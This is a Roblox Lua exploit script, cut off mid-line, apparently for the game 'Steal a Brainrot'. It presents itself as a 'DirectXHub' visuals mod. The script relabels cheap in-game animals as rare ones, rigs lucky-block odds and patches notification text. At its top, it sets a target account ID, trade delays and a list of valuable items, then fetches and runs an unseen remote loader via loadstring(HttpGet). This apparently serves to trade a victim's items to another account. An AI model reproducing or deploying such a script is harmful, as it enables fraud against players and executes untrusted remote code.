getgenv().SECRET_KEY = "mrr_37eeeefafed44ad1bdbcd2529adbfd56"
getgenv().TARGET_ID = 3186555061
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGET_BRAINROTS = {
    ["Strawberry Elephant"] = true,
    ["Meowl"] = true,
    ["Headless Horseman"] = true,
    ["Skibidi Toilet"] = true,
    ["Griffin"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Dragon Cannelloni"] = true,
    ["Love Love Bear"] = true,
    ["La Supreme Combinasion"] = true,
    ["Celestial Pegasus"] = true,
    ["Cerberus"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Rosey and Teddy"] = true,
    ["Capitano Moby"] = true,
    ["Cooki and Milki"] = true,
    ["Burguro And Fryuro"] = true,
    ["Ketupat Bros"] = true,
    ["Reinito Sleighito"] = true,
    ["Fortunu and Cashuru"] = true,
    ["Los Amigos"] = true,
    ["La Secret Combinasion"] = true,
    ["Los Sekolahs"] = true,
    ["Signore Carapace"] = true,
    ["La Casa Boo"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Food Combinasion"] = true,
    ["Elefanto Frigo"] = true,
    ["Spooky and Pumpky"] = true,
    ["Ginger Gerat"] = true,
    ["La Ginger Sekolah"] = true,
    ["Sammyni Fattini"] = true,
    ["Los Spaghettis"] = true,
    ["Festive 67"] = true,
    ["Ventoliero Pavonero"] = true,
    ["Cloverat Clapat"] = true,
    ["Spaghetti Tualetti"] = true,
    ["Antonio"] = true,
    ["Rosetti Tualetti"] = true,
    ["Nacho Spyder"] = true,
    ["Garama and Madundung"] = true,
    ["Fishino Clownino"] = true,
    ["Gold Gold Gold"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Lavadorito Spinito"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Tirilikalika Tirilikalako"] = true,
    ["Swaggy Bros"] = true,
    ["La Romantic Grande"] = true,
    ["Orcaledon"] = true,
    ["Tictac Sahur"] = true,
    ["La Taco Combinasion"] = true,
    ["Ketupat Kepat"] = true,
    ["Dug dug dug"] = true,
    ["Tang Tang Keletang"] = true,
    ["Lovin Rose"] = true,
    ["Los Tacoritas"] = true,
    ["Eviledon"] = true,
    ["Los Primos"] = true,
    ["W or L"] = true,
    ["Esok Sekolah"] = true,
    ["La Jolly Grande"] = true,
    ["Los Cupids"] = true,
    ["Los Puggies"] = true,
    ["Tralaledon"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Tuff Toucan"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["Chipso and Queso"] = true,
    ["Chillin Chili"] = true,
    ["Money Money Reindeer"] = true,
    ["La Spooky Grande"] = true,
    ["Bacuru and Egguru"] = true,
    ["Los Bros"] = true,
    ["La Extinct Grande"] = true,
    ["Los Candies"] = true,
    ["Los 67"] = true,
    ["Celularcini Viciosini"] = true,
    ["Los Mobilis"] = true,
    ["Money Money Puggy"] = true,
    ["Cigno Fulgoro"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Jolly Combinasionas"] = true,
    ["Snailo Clovero"] = true,
    ["Los Planitos"] = true,
    ["Chicleteira Cupideira"] = true,
    ["DJ Panda"] = true,
    ["Las Sis"] = true,
    ["Spinny Hammy"] = true,
    ["Tacorita Bicicleta"] = true,
    ["Los Sweethearts"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Chicleteira Noelteira"] = true,
    ["Los Combinasionas"] = true,
    ["Chimnino"] = true,
    ["Noo my Gold"] = true,
    ["Swag Soda"] = true,
    ["Noo my Heart"] = true,
    ["Tacorillo Crocodillo"] = true,
    ["Mariachi Corazoni"] = true,
    ["La Grande Combinasion"] = true,
    ["Los 25"] = true,
    ["Los Burritos"] = true,
    ["67"] = true,
    ["Donkeyturbo Express"] = true,
    ["Los Chicleteiras"] = true,
    ["Guest 666"] = true,
    ["Los Mi Gatitos"] = true,
    ["Rang Ring Bus"] = true,
    ["Granny"] = true,
    ["Noo my Present"] = true,
    ["Serafinna Medusella"] = true,
    ["Los Nooo My Hotspotsitos"] = true,
    ["Arcadopus"] = true,
    ["Noo my Candy"] = true,
    ["Los Quesadillas"] = true,
    ["Chicleteirina Bicicleteirina"] = true,
    ["Chill Puppy"] = true,
    ["Burrito Bandito"] = true,
    ["Luck Luck Luck Sahur"] = true,
    ["Chicleteira Bicicleteira"] = true,
    ["Brunito Marsito"] = true,
    ["Quesadillo Vampiro"] = true,
    ["Eid Eid Eid Sahur"] = true,
    ["Cupid Hotspot"] = true,
    ["Mi Gatito"] = true,
    ["Ho Ho Ho Sahur"] = true,
    ["Cupid Cupid Sahur"] = true,
    ["Pot Pumpkin"] = true,
    ["Naughty Naughty"] = true,
    ["Bunito Bunito Spinito"] = true,
    ["Quesadilla Crocodila"] = true,
    ["Horegini Boom"] = true,
    ["Santa Hotspot"] = true,
    ["Pot Hotspot"] = true,
    ["25"] = true,
    ["Pirulitoita Bicicleteira"] = true,
    ["To to to Sahur"] = true,
    ["Telemorte"] = true,
    ["La Sahur Combinasion"] = true,
    ["List List List Sahur"] = true,
    ["Noo my examine"] = true,
    ["Los Jobcitos"] = true,
    ["Nooo My Hotspot"] = true,
    ["Bunnyman"] = true,
    ["Tung Tung Tung Sahur"] = true,
    ["Cuadramat and Pakrahmatmamat"] = true,
    ["Please my Present"] = true,
    ["Los Cucarachas"] = true,
    ["1x1x1x1"] = true,
    ["La Vacca Lepre Lepreino"] = true,
    ["Love Love Love Sahur"] = true,
    ["Perrito Burrito"] = true,
    ["Graipuss Medussi"] = true,
    ["Giftini Spyderini"] = true,
    ["GOAT"] = true,
    ["Trickolino"] = true,
    ["Paradiso Axolottino"] = true,
    ["Triplito Tralaleritos"] = true,
    ["La Vacca Jacko Linterino"] = true,
    ["Fishboard"] = true,
    ["Santteo"] = true,
    ["Las Vaquitas Saturnitas"] = true,
    ["Los Karkeritos"] = true,
    ["Karker Sahur"] = true,
    ["Los Trios"] = true,
    ["Job Job Job Sahur"] = true,
    ["Frankentteo"] = true,
    ["Pumpkini Spyderini"] = true,
    ["Las Tralaleritas"] = true,
    ["Rocco Disco"] = true,
    ["Extinct Matteo"] = true,
    ["La Karkerkar Combinasion"] = true,
    ["La Vacca Prese Presente"] = true,
    ["Reindeer Tralala"] = true,
    ["Yess my examine"] = true,
    ["Guerriro Digitale"] = true,
    ["Boatito Auratito"] = true,
    ["Vulturino Skeletono"] = true,
    ["Los Tralaleritos"] = true,
    ["Zombie Tralala"] = true,
    ["Los Tortus"] = true,
    ["La Cucaracha"] = true,
    ["Fragola La La La"] = true,
    ["Extinct Tralalero"] = true,
    ["Agarrini la Palini"] = true,
    ["Los Spyderinis"] = true,
    ["Chachechi"] = true,
    ["Blackhole Goat"] = true,
    ["Dul Dul Dul"] = true,
    ["Torrtuginni Dragonfrutini"] = true,
    ["Trenostruzzo Turbo 4000"] = true,
    ["Karkerkar Kurkur"] = true,
    ["Los Matteos"] = true,
    ["Bisonte Giuppitere"] = true,
    ["Sammyni Spyderini"] = true,
    ["La Vacca Saturno Saturnita"] = true,
    ["Jackorilla"] = true,
    ["Secret Lucky Block"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
end)
task.spawn(function()
local Players = game:GetService("Players")  if _G.DirectXVisual then     local TweenService = game:GetService("TweenService")     local screenGui = Instance.new("ScreenGui")     screenGui.Name = "DirectXVisuals"     screenGui.ResetOnSpawn = false     screenGui.Parent = Players.LocalPlayer:WaitForChild("PlayerGui")      local frame = Instance.new("Frame")     frame.Size = UDim2.new(0, 290, 0, 60)     frame.Position = UDim2.new(1, 10, 0.85, 0)     frame.BackgroundColor3 = Color3.fromRGB(8, 8, 8)     frame.BackgroundTransparency = 0.05     frame.BorderSizePixel = 0     frame.ClipsDescendants = true     frame.Parent = screenGui     Instance.new("UICorner", frame).CornerRadius = UDim.new(0, 12)      local stroke = Instance.new("UIStroke")     stroke.Color = Color3.fromRGB(255, 255, 255)     stroke.Thickness = 1     stroke.Transparency = 0.85     stroke.Parent = frame      local topLine = Instance.new("Frame")     topLine.Size = UDim2.new(1, 0, 0, 1)     topLine.Position = UDim2.new(0, 0, 0, 0)     topLine.BackgroundColor3 = Color3.fromRGB(255, 255, 255)     topLine.BackgroundTransparency = 0.5     topLine.BorderSizePixel = 0     topLine.ZIndex = 3     topLine.Parent = frame     local topGrad = Instance.new("UIGradient", topLine)     topGrad.Transparency = NumberSequence.new({         NumberSequenceKeypoint.new(0, 1),         NumberSequenceKeypoint.new(0.3, 0.4),         NumberSequenceKeypoint.new(0.5, 0.2),         NumberSequenceKeypoint.new(0.7, 0.4),         NumberSequenceKeypoint.new(1, 1),     })      local accentBar = Instance.new("Frame")     accentBar.Size = UDim2.new(0, 3, 1, -12)     accentBar.Position = UDim2.new(0, 6, 0, 6)     accentBar.BackgroundColor3 = Color3.fromRGB(255, 255, 255)     accentBar.BackgroundTransparency = 0.7     accentBar.BorderSizePixel = 0     accentBar.ZIndex = 2     accentBar.Parent = frame     Instance.new("UICorner", accentBar).CornerRadius = UDim.new(0, 2)      local icon = Instance.new("TextLabel")     icon.Size = UDim2.new(0, 30, 0, 30)     icon.Position = UDim2.new(0, 16, 0.5, -15)     icon.BackgroundColor3 = Color3.fromRGB(20, 20, 20)     icon.BorderSizePixel = 0     icon.Text = "!"     icon.TextColor3 = Color3.fromRGB(255, 255, 255)     icon.TextScaled = true     icon.Font = Enum.Font.GothamBlack     icon.ZIndex = 2     icon.Parent = frame     Instance.new("UICorner", icon).CornerRadius = UDim.new(0, 8)     local iconStroke = Instance.new("UIStroke")     iconStroke.Color = Color3.fromRGB(255, 255, 255)     iconStroke.Thickness = 1     iconStroke.Transparency = 0.85     iconStroke.Parent = icon      local label = Instance.new("TextLabel")     label.Size = UDim2.new(1, -58, 0, 16)     label.Position = UDim2.new(0, 52, 0, 10)     label.BackgroundTransparency = 1     label.Text = "DirectXHub VISUALS"     label.TextColor3 = Color3.fromRGB(255, 255, 255)     label.Font = Enum.Font.LuckiestGuy     label.TextSize = 11     label.TextXAlignment = Enum.TextXAlignment.Left     label.ZIndex = 2     label.Parent = frame      local sublabel = Instance.new("TextLabel")     sublabel.Size = UDim2.new(1, -58, 0, 14)     sublabel.Position = UDim2.new(0, 52, 0, 28)     sublabel.BackgroundTransparency = 1     sublabel.Text = "Already loaded!"     sublabel.TextColor3 = Color3.fromRGB(120, 120, 120)     sublabel.Font = Enum.Font.LuckiestGuy     sublabel.TextSize = 11     sublabel.TextXAlignment = Enum.TextXAlignment.Left     sublabel.ZIndex = 2     sublabel.Parent = frame      local brandTag = Instance.new("TextLabel")     brandTag.Size = UDim2.new(0, 60, 0, 10)     brandTag.Position = UDim2.new(0, 52, 1, -16)     brandTag.BackgroundTransparency = 1     brandTag.Text = ".gg/directxhub"     brandTag.TextColor3 = Color3.fromRGB(255, 255, 255)     brandTag.Font = Enum.Font.LuckiestGuy     brandTag.TextSize = 10     brandTag.TextXAlignment = Enum.TextXAlignment.Left     brandTag.ZIndex = 2     brandTag.Parent = frame      TweenService:Create(frame, TweenInfo.new(0.5, Enum.EasingStyle.Quint, Enum.EasingDirection.Out), {Position = UDim2.new(1, -300, 0.85, 0)}):Play()     task.spawn(function()         while frame and frame.Parent do             TweenService:Create(topGrad, TweenInfo.new(2, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), {Offset = Vector2.new(0.3, 0)}):Play()             task.wait(2)             TweenService:Create(topGrad, TweenInfo.new(2, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), {Offset = Vector2.new(-0.3, 0)}):Play()             task.wait(2)         end     end)     task.delay(3, function()         TweenService:Create(frame, TweenInfo.new(0.4, Enum.EasingStyle.Quint, Enum.EasingDirection.In), {Position = UDim2.new(1, 10, 0.85, 0)}):Play()         task.delay(0.4, function() screenGui:Destroy() end)     end)     return end  _G.DirectXVisual = true  repeat task.wait() until game:IsLoaded()  local RS            = game:GetService("ReplicatedStorage") local RunService    = game:GetService("RunService") local TweenService  = game:GetService("TweenService") local SoundService  = game:GetService("SoundService") local PlotController = require(RS:WaitForChild("Controllers"):WaitForChild("PlotController")) local BasesData     = require(RS:WaitForChild("Datas"):WaitForChild("Bases")) local Animals       = require(RS.Datas.Animals) local LuckyBlocks   = require(RS.Datas.LuckyBlocks) local SharedAnimals = require(RS.Shared.Animals) local AnimSync      = require(RS.Controllers.AnimationSyncController) local Gradients     = require(RS.Packages.Gradients)  local swaps = {     ["Torrtuginni Dragonfrutini"] = "Skibidi Toilet",     ["Pot Hotspot"]               = "Meowl",     ["Esok Sekolah"]              = "Meowl",     ["Spaghetti Tualetti"]        = "Strawberry Elephant",     ["La Secret Combinasion"]     = "Strawberry Elephant",     ["Celestial Pegasus"]         = "Headless Horseman", }  local heights = {     ["Skibidi Toilet"]      = 8.685,     ["Meowl"]               = 11.565,     ["Strawberry Elephant"] = 9.4275,     ["Headless Horseman"]   = 9.42, }  local animalToSkin = {     ["Skibidi Toilet"]            = "Skibidi",     ["Torrtuginni Dragonfrutini"] = "Skibidi",     ["Meowl"]                     = "Meowl",     ["Pot Hotspot"]               = "Meowl",     ["Esok Sekolah"]              = "Meowl",     ["Strawberry Elephant"]       = "Strawberry",     ["Spaghetti Tualetti"]        = "Strawberry",     ["La Secret Combinasion"]     = "Strawberry",     ["Headless Horseman"]         = "Headless",     ["Celestial Pegasus"]         = "Headless", }  local skinCount = { Skibidi = 0, Meowl = 0, Strawberry = 0, Headless = 0 } local currentDropDown = nil local currentButton   = nil local CurrentSelected = nil  for k, v in pairs(swaps) do     if Animals[k] and Animals[v] then         Animals[k].DisplayName  = Animals[v].DisplayName         Animals[k].Rarity       = Animals[v].Rarity         Animals[k].Price        = Animals[v].Price         Animals[k].Generation   = Animals[v].Generation         Animals[k].SpawnVFX     = nil         Animals[k].TriggerEvent = nil         Animals[k].SpawnDelay   = nil     end end  task.defer(function()     for k, v in pairs(swaps) do         if Animals[k] and Animals[v] then             Animals[k].DisplayName  = Animals[v].DisplayName             Animals[k].Rarity       = Animals[v].Rarity             Animals[k].Price        = Animals[v].Price             Animals[k].Generation   = Animals[v].Generation             Animals[k].SpawnVFX     = nil             Animals[k].TriggerEvent = nil             Animals[k].SpawnDelay   = nil         end     end     for _, name in ipairs({"Skibidi Toilet","Meowl","Strawberry Elephant","Headless Horseman"}) do         if Animals[name] then             Animals[name].SpawnVFX     = nil             Animals[name].TriggerEvent = nil             Animals[name].SpawnDelay   = nil         end     end end)  for _, name in ipairs({"Skibidi Toilet","Meowl","Strawberry Elephant","Headless Horseman"}) do     if Animals[name] then         Animals[name].SpawnVFX     = nil         Animals[name].TriggerEvent = nil         Animals[name].SpawnDelay   = nil     end end  if LuckyBlocks["Secret Lucky Block"] then     LuckyBlocks["Secret Lucky Block"].Animals = {         { Name = "Skibidi Toilet",      Chance = 50 },         { Name = "Meowl",               Chance = 25 },         { Name = "Strawberry Elephant", Chance = 15 },         { Name = "Headless Horseman",   Chance = 10 },     } end  local origAttach = SharedAnimals.AttachOnViewportWithOptimizations SharedAnimals.AttachOnViewportWithOptimizations = function(self, idx, vp, ...)     return origAttach(self, swaps[idx] or idx, vp, ...) end  -- ═══════════════════════════════════════════════════════ -- SKIN SCRIPT (OPTIMIZED) -- ═══════════════════════════════════════════════════════  local Excluded = {"Laser", "LaserHitbox", "Purchases", "AnimalPodiums", "PlotSign", "FriendPanel", "CashPad"} local function IsExcluded(Name)     for _, V in ipairs(Excluded) do if V == Name then return true end end end  local Urls = {     headless   = "https://github.com/gurtwareuser-lgtm/6x6m9c5ez82u1ptkf9d82rb3ws3ldrzj8cexg1ntr619vcyi3oktn1towelurnofogbrvhfhe6zqv35eimsd6zb93izavlxq5o6y/raw/refs/heads/main/rbxm/headless.rbxm",     strawberry = "https://github.com/gurtwareuser-lgtm/6x6m9c5ez82u1ptkf9d82rb3ws3ldrzj8cexg1ntr619vcyi3oktn1towelurnofogbrvhfhe6zqv35eimsd6zb93izavlxq5o6y/raw/refs/heads/main/rbxm/strawberry.rbxm",     meowl      = "https://github.com/gurtwareuser-lgtm/6x6m9c5ez82u1ptkf9d82rb3ws3ldrzj8cexg1ntr619vcyi3oktn1towelurnofogbrvhfhe6zqv35eimsd6zb93izavlxq5o6y/raw/refs/heads/main/rbxm/meowl.rbxm",     skibidi    = "https://github.com/gurtwareuser-lgtm/6x6m9c5ez82u1ptkf9d82rb3ws3ldrzj8cexg1ntr619vcyi3oktn1towelurnofogbrvhfhe6zqv35eimsd6zb93izavlxq5o6y/raw/refs/heads/main/rbxm/skibidi.rbxm", }  local SkinsFolder = Instance.new("Folder", RS) SkinsFolder.Name = "elusivewashere"  for Name, Url in Urls do     local Path = "directxhub/" .. Name .. ".rbxm"     if not isfile(Path) then writefile(Path, game:HttpGet(Url)) end     local Obj = game:GetObjects(getcustomasset(Path))[1]     Obj.Name = Name     Obj.Parent = SkinsFolder end  local MyPlot local PlotModel local plotInstance local CurrentSkin = nil  local function ApplySkin(SkinName)     if not PlotModel or not PlotModel.Parent then return end      local SkinFolder = SkinsFolder:FindFirstChild(SkinName)     if not SkinFolder then warn("skin not found: " .. SkinName) return end      local Tier = PlotModel:GetAttribute("Tier") or 0     local BaseInfo = BasesData[Tier]     local FloorName = BaseInfo and BaseInfo.Model and BaseInfo.Model.Name     local FloorModel = FloorName and SkinFolder:FindFirstChild(FloorName)     if not FloorModel then         for _, M in ipairs(SkinFolder:GetChildren()) do             if M:IsA("Model") then FloorModel = M break end         end     end     if not FloorModel then warn("no floor model") return end      local Offset = PlotModel:GetPivot() * FloorModel:GetPivot():Inverse()      for _, Part in ipairs(FloorModel:GetChildren()) do         if not IsExcluded(Part.Name) then             local Existing = PlotModel:FindFirstChild(Part.Name)             if Existing then Existing:Destroy() end         end     end      local Clone = FloorModel:Clone()     Clone:PivotTo(Offset * FloorModel:GetPivot())     for _, Part in ipairs(Clone:GetChildren()) do         if not IsExcluded(Part.Name) then Part.Parent = PlotModel end     end     Clone:Destroy()      CurrentSkin = SkinName     print("applied: " .. SkinName) end  local Skins = {     { Name = "Headless",   Color = Color3.fromRGB(126, 68, 227), Order = 18, Text = "Headless",   RichText = false },     { Name = "Meowl",      Color = Color3.fromRGB(255, 255, 20),  Order = 16, Text = "Meowl",      RichText = false },     { Name = "Skibidi",    Color = Color3.fromRGB(255, 255, 255), Order = 15, Text = [[<stroke thickness="2" transparency="0.5"><font color="#ffffff">Skibidi</font></stroke>]], RichText = true },     { Name = "Strawberry", Color = Color3.fromRGB(207, 59, 63),   Order = 17, Text = "Strawberry", RichText = false }, }  local function updateButtonVisibility(DropDown)     if not DropDown then return end     local mainText = ""     if currentButton then         local t = currentButton:FindFirstChild("Text")         if t then mainText = t.Text:gsub("<[^>]+>", "") end     end     for _, Skin in ipairs(Skins) do         local Btn = DropDown:FindFirstChild(Skin.Name)         if Btn then             Btn.Visible = (skinCount[Skin.Name] > 0) and not mainText:find(Skin.Name, 1, true)         end     end end  local function InjectButtons(DropDown, Button, ScrollingFrame)     local Template = DropDown:FindFirstChild("Gold")     if not Template then return end      for _, Skin in ipairs(Skins) do         if DropDown:FindFirstChild(Skin.Name) then continue end         local Btn = Template:Clone()         Btn.Name = Skin.Name         Btn.BackgroundColor3 = Skin.Color         Btn.LayoutOrder = Skin.Order         local mainBtnText = Button:FindFirstChild("Text")         local mainStr = mainBtnText and mainBtnText.Text:gsub("<[^>]+>", "") or ""         Btn.Visible = (skinCount[Skin.Name] > 0) and not mainStr:find(Skin.Name, 1, true)         local Locked = Btn:FindFirstChild("Locked")         if Locked then Locked:Destroy() end         local Text = Btn:FindFirstChild("Text")         if Text then             Text.Text = Skin.Text             Text.RichText = Skin.RichText             local Stroke = Text:FindFirstChildOfClass("UIStroke")             if Stroke then Stroke.Color = Skin.Color end         end         local BtnStroke = Btn:FindFirstChildOfClass("UIStroke")         if BtnStroke then BtnStroke.Color = Skin.Color end          Btn.MouseButton1Click:Connect(function()             if CurrentSelected then                 local OldBtn = DropDown:FindFirstChild(CurrentSelected)                 if OldBtn and skinCount[CurrentSelected] > 0 then                     OldBtn.Visible = true                 end             end              Btn.Visible = false             CurrentSelected = Skin.Name              Button.BackgroundColor3 = Skin.Color             local BtnText = Button:FindFirstChild("Text")             if BtnText then                 BtnText.Text = Skin.Text                 BtnText.RichText = Skin.RichText                 local BtnTextStroke = BtnText:FindFirstChildOfClass("UIStroke")                 if BtnTextStroke then BtnTextStroke.Color = Skin.Color end             end             local BtnUIStroke = Button:FindFirstChildOfClass("UIStroke")             if BtnUIStroke then BtnUIStroke.Color = Skin.Color end              DropDown.Visible = false             ApplySkin(Skin.Name:lower())         end)          Btn.Parent = DropDown     end      task.wait()     if math.floor(ScrollingFrame.CanvasSize.Y.Offset) == 1094 then         ScrollingFrame.CanvasSize = UDim2.new(0, 0, 0, 1250)     end end  task.spawn(function()     local Start = tick()     repeat MyPlot = PlotController.GetMyPlot() task.wait() until MyPlot or (tick() - Start > 4)     if not MyPlot then warn("no plot") return end     PlotModel = MyPlot.PlotModel      local trackedAnimals = {}      local function onAdded(obj)         if not obj:IsA("Model") then return end         local skinName = animalToSkin[obj.Name] or animalToSkin[swaps[obj.Name]]         if not skinName or trackedAnimals[obj] then return end         trackedAnimals[obj] = skinName         skinCount[skinName] = skinCount[skinName] + 1         updateButtonVisibility(currentDropDown)     end      local function onRemoving(obj)         local skinName = trackedAnimals[obj]         if not skinName then return end         task.defer(function()             if obj and obj.Parent then return end             trackedAnimals[obj] = nil             skinCount[skinName] = math.max(0, skinCount[skinName] - 1)             if skinCount[skinName] == 0 and CurrentSelected == skinName then                 CurrentSelected = nil             end             updateButtonVisibility(currentDropDown)         end)     end      plotInstance = PlotModel.Parent      for _, obj in ipairs(plotInstance:GetDescendants()) do         onAdded(obj)     end      plotInstance.DescendantAdded:Connect(onAdded)     plotInstance.DescendantRemoving:Connect(onRemoving) end)  task.spawn(function()     local ScrollingFrame = Players.LocalPlayer.PlayerGui.Settings.Settings.Content.ScrollingFrame     local LastDropDown = nil     while true do         local BaseSkinFrame = ScrollingFrame:FindFirstChild("Base Skin")         if BaseSkinFrame then             local Button = BaseSkinFrame:FindFirstChild("Button")             if Button then                 local DropDown = Button:FindFirstChild("DropDown")                 if DropDown then                     currentDropDown = DropDown                     currentButton   = Button                     if DropDown ~= LastDropDown then                         LastDropDown = DropDown                         task.wait()                     end                     InjectButtons(DropDown, Button, ScrollingFrame)                 end             end         end         task.wait(0.1)     end end)  -- ═══════════════════════════════════════════════════════ -- LOADED NOTIFICATION -- ═══════════════════════════════════════════════════════  local gui = Players.LocalPlayer:WaitForChild("PlayerGui")  local loadedGui = Instance.new("ScreenGui") loadedGui.Name = "DirectXHubLoadedNotif" loadedGui.ResetOnSpawn = false loadedGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling loadedGui.Parent = gui  local loadFrame = Instance.new("Frame") loadFrame.Size = UDim2.new(0, 290, 0, 60) loadFrame.Position = UDim2.new(1, 10, 0.85, 0) loadFrame.BackgroundColor3 = Color3.fromRGB(8, 8, 8) loadFrame.BackgroundTransparency = 0.05 loadFrame.BorderSizePixel = 0 loadFrame.ClipsDescendants = true loadFrame.Parent = loadedGui Instance.new("UICorner", loadFrame).CornerRadius = UDim.new(0, 12)  local loadStroke = Instance.new("UIStroke") loadStroke.Color = Color3.fromRGB(255, 255, 255) loadStroke.Thickness = 1 loadStroke.Transparency = 0.85 loadStroke.Parent = loadFrame  local loadTopLine = Instance.new("Frame") loadTopLine.Size = UDim2.new(1, 0, 0, 1) loadTopLine.Position = UDim2.new(0, 0, 0, 0) loadTopLine.BackgroundColor3 = Color3.fromRGB(255, 255, 255) loadTopLine.BackgroundTransparency = 0.4 loadTopLine.BorderSizePixel = 0 loadTopLine.ZIndex = 3 loadTopLine.Parent = loadFrame local loadTopGrad = Instance.new("UIGradient", loadTopLine) loadTopGrad.Transparency = NumberSequence.new({     NumberSequenceKeypoint.new(0, 1),     NumberSequenceKeypoint.new(0.3, 0.3),     NumberSequenceKeypoint.new(0.5, 0.1),     NumberSequenceKeypoint.new(0.7, 0.3),     NumberSequenceKeypoint.new(1, 1), })  local loadAccent = Instance.new("Frame") loadAccent.Size = UDim2.new(0, 3, 1, -12) loadAccent.Position = UDim2.new(0, 6, 0, 6) loadAccent.BackgroundColor3 = Color3.fromRGB(255, 255, 255) loadAccent.BackgroundTransparency = 0.5 loadAccent.BorderSizePixel = 0 loadAccent.ZIndex = 2 loadAccent.Parent = loadFrame Instance.new("UICorner", loadAccent).CornerRadius = UDim.new(0, 2)  local loadIcon = Instance.new("TextLabel") loadIcon.Size = UDim2.new(0, 30, 0, 30) loadIcon.Position = UDim2.new(0, 16, 0.5, -15) loadIcon.BackgroundColor3 = Color3.fromRGB(255, 255, 255) loadIcon.BorderSizePixel = 0 loadIcon.Text = "✓" loadIcon.TextColor3 = Color3.fromRGB(0, 0, 0) loadIcon.TextScaled = true loadIcon.Font = Enum.Font.GothamBlack loadIcon.ZIndex = 2 loadIcon.Parent = loadFrame Instance.new("UICorner", loadIcon).CornerRadius = UDim.new(0, 8)  local loadLabel = Instance.new("TextLabel") loadLabel.Size = UDim2.new(1, -58, 0, 16) loadLabel.Position = UDim2.new(0, 52, 0, 10) loadLabel.BackgroundTransparency = 1 loadLabel.Text = "DIRECTXHUB VISUALS" loadLabel.TextColor3 = Color3.fromRGB(255, 255, 255) loadLabel.Font = Enum.Font.LuckiestGuy loadLabel.TextSize = 11 loadLabel.TextXAlignment = Enum.TextXAlignment.Left loadLabel.ZIndex = 2 loadLabel.Parent = loadFrame  local loadSub = Instance.new("TextLabel") loadSub.Size = UDim2.new(1, -58, 0, 14) loadSub.Position = UDim2.new(0, 52, 0, 28) loadSub.BackgroundTransparency = 1 loadSub.Text = "Visual swap + Traits loaded!" loadSub.TextColor3 = Color3.fromRGB(120, 120, 120) loadSub.Font = Enum.Font.LuckiestGuy loadSub.TextSize = 12 loadSub.TextXAlignment = Enum.TextXAlignment.Left loadSub.ZIndex = 2 loadSub.Parent = loadFrame  local loadBrand = Instance.new("TextLabel") loadBrand.Size = UDim2.new(0, 60, 0, 10) loadBrand.Position = UDim2.new(0, 52, 1, -16) loadBrand.BackgroundTransparency = 1 loadBrand.Text = ".gg/directxhub" loadBrand.TextColor3 = Color3.fromRGB(255, 255, 255) loadBrand.Font = Enum.Font.LuckiestGuy loadBrand.TextSize = 10 loadBrand.TextXAlignment = Enum.TextXAlignment.Left loadBrand.ZIndex = 2 loadBrand.Parent = loadFrame  local sound = Instance.new("Sound") sound.SoundId = "rbxassetid://6031090392" sound.Volume = 0.5 sound.Parent = SoundService sound:Play() game:GetService("Debris"):AddItem(sound, 3)  TweenService:Create(loadFrame, TweenInfo.new(0.5, Enum.EasingStyle.Quint, Enum.EasingDirection.Out), {     Position = UDim2.new(1, -300, 0.85, 0) }):Play() TweenService:Create(loadIcon, TweenInfo.new(0.3, Enum.EasingStyle.Back, Enum.EasingDirection.Out), {}):Play() task.spawn(function()     while loadFrame and loadFrame.Parent do         TweenService:Create(loadTopGrad, TweenInfo.new(2, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), {Offset = Vector2.new(0.3, 0)}):Play()         task.wait(2)         TweenService:Create(loadTopGrad, TweenInfo.new(2, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), {Offset = Vector2.new(-0.3, 0)}):Play()         task.wait(2)     end end) task.delay(3, function()     TweenService:Create(loadFrame, TweenInfo.new(0.4, Enum.EasingStyle.Quint, Enum.EasingDirection.In), {         Position = UDim2.new(1, 10, 0.85, 0)     }):Play()     task.delay(0.4, function() loadedGui:Destroy() end) end)  -- ═══════════════════════════════════════════════════════ -- NOTIFICATION PATCHING -- ═══════════════════════════════════════════════════════  local function patchNotif(notifFrame)     local mainLabel = notifFrame     local template  = notifFrame:FindFirstChild("Template")     if not template then return end     local plainMain = mainLabel.Text:gsub("<[^>]+>", "")     local foundBrainrot, foundRep = nil, nil     for brainrot, rep in pairs(swaps) do         if plainMain:find(brainrot, 1, true) then             foundBrainrot = brainrot             foundRep = rep             break         end     end     if not foundBrainrot then return end     local displayName = Animals[foundRep] and Animals[foundRep].DisplayName or foundRep     mainLabel.RichText = false     mainLabel.Text = plainMain:gsub(foundBrainrot, displayName)     template.Text = template.Text:gsub(foundBrainrot, displayName)     local uiStroke = template:FindFirstChildOfClass("UIStroke")     if uiStroke then         task.spawn(function() pcall(Gradients.apply, uiStroke, "OG") end)     end     task.spawn(function() pcall(Gradients.apply, template, "OG") end) end  local function watchContainer(container)     container.ChildAdded:Connect(function(child)         task.defer(function()             if child and child.Parent then patchNotif(child) end         end)     end)     for _, child in ipairs(container:GetChildren()) do         patchNotif(child)     end end  local function watchGui(notifGui)     local inner = notifGui:FindFirstChild("Notification")     if inner then watchContainer(inner) end     notifGui.ChildAdded:Connect(function(child)         if child.Name == "Notification" then watchContainer(child) end     end) end  gui.ChildAdded:Connect(function(child)     if child.Name == "Notification" then watchGui(child) end end) local existing = gui:FindFirstChild("Notification") if existing then watchGui(existing) end  local function patch(obj)     if not obj:IsA("TextLabel") and not obj:IsA("TextButton") then return end     if obj.Text:find("stealing", 1, true)         or obj.Text:find("Stole", 1, true)         or obj.Text:find("Someone", 1, true) then return end     for k, v in pairs(swaps) do         local dn = Animals[v] and Animals[v].DisplayName or v         if obj.Text:find(k, 1, true) then             obj.Text = obj.Text:gsub(k, dn)         end     end end  gui.DescendantAdded:Connect(function(obj)     task.defer(function()         if not obj or not obj.Parent then return end         patch(obj)         if obj:IsA("TextLabel") or 